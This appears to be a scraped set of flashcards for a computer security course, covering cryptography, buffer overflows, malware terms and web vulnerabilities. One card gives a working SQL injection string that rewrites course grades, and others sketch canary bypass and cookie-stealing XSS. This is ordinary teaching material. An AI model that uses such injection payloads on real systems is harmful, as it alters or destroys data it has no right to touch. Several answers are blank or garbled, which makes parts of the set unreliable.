Term
| What is a method by which to ensure integrity of a given message, assuming a shared symmetric key? |
|
Definition
|
|
Term
| A hash function is an example of this. |
|
Definition
| One-way function (NO trapdoor) |
|
|
Term
| A signed attestation that a given principal owns a given public key. |
|
Definition
|
|
Term
| Salts are a necessary ingredient in achieving this property when storing passwords. |
|
Definition
| Resilience to a dictionary attack |
|
|
Term
| The property that a man-in-the-middle cannot undetectably tamper with a transmitted message. |
|
Definition
|
|
Term
| The preferred method of symmetric-key encryption. |
|
Definition
|
|
Term
| The property that an eavesdropper cannot infer anything about a transmitted message. |
|
Definition
|
|
Term
| Compare and contrast a traditional PKI with PGP (give one similarity and one difference) |
|
Definition
Similarities: based on trust, binds keys to principals.
Difference: PGP allows for more complex
trust functions. |
|
|
Term
In the wake of the Heartbleed bug, which protocol consumed greater bandwidth than normal:
CRLs, OCSP, or both? Why? |
|
Definition
CRLs: the amount of bandwidth is proportional to how many certificates were revoked. OCSP
delivers a constant amount based on users’ browsing habits. |
|
|
Term
Symmetric-key crypto mechanisms have different “modes” of encryption like CBC, ECB, etc. There are
none for public-key crypto. Why not? What is the alternative? |
|
Definition
| Too slow. Hybrid encryption. |
|
|
Term
| Explain why you should never use EBC. |
|
Definition
| Leaks information when there is repeated information in the plaintext. |
|
|
Term
| Between CTR mode and CBC mode, which is able to encrypt messages more efficiently? |
|
Definition
| CTR mode: does not depend on the output of the previous round (can run in parallel). |
|
|
Term
| Between CTR mode and CBC mode, which is able to decrypt messages more efficiently? |
|
Definition
| Neither: both can decrypt in parallel. |
|
|
Term
| What role do junk messages play in a mix-net? |
|
Definition
Achieves anonymity in a timely fashion even when only a small number of clients have
anything to send. |
|
|
Term
Suppose that there are N > 5 clients who wish to send, but that the mix-net server only has enough
memory to buffer 5 messages at any time. How would you modify the mix-net protocol summarized
above to ensure that all senders eventually get to communicate without compromising their anonymity
to a passive eavesdropper? |
|
Definition
Collect messages as before, but drop all but 5. You lose some performance but achieve no
less anonymity. |
|
|
Term
Consider the dining cryptographers’ problem with N participants (recall that this includes having every
pair of participants generate a shared random bit). Suppose that an attacker controlled N − 2 participants.
What does the attacker learn about who sent the message when N > 3? |
|
Definition
If you control all but two, then it is equivalent to the three-player protocol. You learn nothing
beyond which of the two it may be. |
|
|
Term
Describe a scenario where you would prefer a digital signature over a MAC, and a scenario where you
would prefer a MAC over a digital signature. |
|
Definition
MAC: when you have a shared key.
Digital signature: when you don’t. For example: MAC, when
it is one-to-one communication, and Signature: when it is one-to-many communication. |
|
|
Term
| Define the property that a MAC must support in order to be considered secure |
|
Definition
| No existential forgery. Given access to (m, t) pairs, cannot create a new, valid (m2, t2 ). |
|
|
Term
Encrypt then MAC
Encrypt = E(x)
MAC = M(x) |
|
Definition
|
|
Term
|
Definition
|
|
Term
|
Definition
|
|
Term
| Which combination of encrypt and MAC is preferred? why? |
|
Definition
| Encrypt then MAC. Works with an arbitrary combination of M, E. |
|
|
Term
| Address space layout randomization |
|
Definition
A means by which the virtual addresses of various memory segments of a process are assigned
random offsets. |
|
|
Term
|
Definition
A piece of malware that keeps itself hidden from detection (e.g., by interposing between the user
and the underlying system, or by overwriting system calls altogether). |
|
|
Term
|
Definition
| A value written between local variables and the saved registers that is difficult for a malicious program to predict; thus, changes to it indicate that a buffer overflow may have overwritten the saved instruction pointers. |
|
|
Term
|
Definition
| A virus that rewrites its code to avoid runtime detection by a static signature. |
|
|
Term
|
Definition
| A virus that encrypts itself differently each time it spreads. |
|
|
Term
| Time of check/Time of use (TOCTOU) |
|
Definition
A vulnerability in which there is a time between (a) when a user’s access to an object is checked
and (b) when the user access the object, during which the object itself could have changed to something the user did not have access to. |
|
|
Term
|
Definition
| A piece of malware that triggers after a certain amount of time (or at a particular date). |
|
|
Term
|
Definition
A software testing mechanism, involving generating random inputs and feeding them to the soft-
ware. There are various kinds of fuzz testing, each of which corresponds to a different means of generating random input. |
|
|
Term
| Agree or Disagree: Cross-site request forgery (CSRF) attacks are just special cases of cross-site scripting attacks (XSS). |
|
Definition
Disagree: CSRF exploits trust that a website has in its user to provide proper input, while XSS
exploits trust that a user has in the content delivered by a website. |
|
|
Term
| On a SQL server: Provide a username and password that would allow you to view everyone’s grades. |
|
Definition
|
|
Term
| On a SQL server: Provide a username and password that would allow you to give everyone in CMSC414 an A. |
|
Definition
| ’); UPDATE Grades SET StudentGrade=’A’ WHERE Course=’CMSC414’; -- |
|
|
Term
| On a SQL server: Provide a username and password that delete the Grades table altogether. |
|
Definition
|
|
Term
You are given an application consisting of 40,000,000 lines of code. Describe a way you would go about
determining whether this code was vulnerable to a buffer overflow exploit. |
|
Definition
Fuzz testing. Could also scan the code for unsafe methods, but this may not catch some, e.g.,
malloc with bad bounds checking. |
|
|
Term
Programmer Pete has developed his own alternative to canaries. With each function call, he generates a
random 8-bit, odd number, and pushes it onto the stack before loading any local variables. Describe how
you would modify your typical buffer overflow attack to get around this, and reason about your likelihood
of success. |
|
Definition
Include an extra 8 bits between the buffer and the saved instruction pointer. Set these to any
odd number (say, all ones). Keep trying until it works. The probability that it succeeds is one in
28 /2 = 1/128. |
|
|
Term
Upset that you defeated his canaries, Programmer Pete decides to set all memory corresponding to a
program’s stack to be non-executable. Describe how you would get around this. |
|
Definition
|
|
Term
As a last-ditch effort, Programmer Pete changes his compiler so that both his stack and his heap grow up
in memory (from low addresses to high). Does this change make code injection attacks impossible? Why
or why not? |
|
Definition
| No: it is possible to overwrite memory in the heap up to the saved addresses. |
|
|
Term
Online banking site bank.com has a login page, with URLs of the form:
http://bank.com/login.php?user= username&pass= password
Name and describe a vulnerability in bank.com’s use of this approach. Also, briefly sketch a scenario in
which an attacker would exploit this vulnerability. |
|
Definition
| CSRF (cross-site request forgery). The attacker gets the user to visit his site, and includes, say, a
[image] tag to force the user to automatically log in as the attacker. The attacker could
subsequently learn of the user’s information and force him to pay his bills, or potentially use this
as a stepping stone to launder attacks through the victim’s machine. |
|
|
Term
To mitigate against this attack, bank.com changes their login URL to only include the username, that is,
http://bank.com/login.php?user=username, which then sends users to a page that looks like:
(img with username filled in)
This solved one attack while making another attack possible! Name and describe what new vulnerability
bank.com just introduced. Also, briefly describe how an attacker could make use of this vulnerability. |
|
Definition
Reflected XSS: could exploit the fact that the user is already logged in to exfiltrate the user’s
session cookies. |
|
|
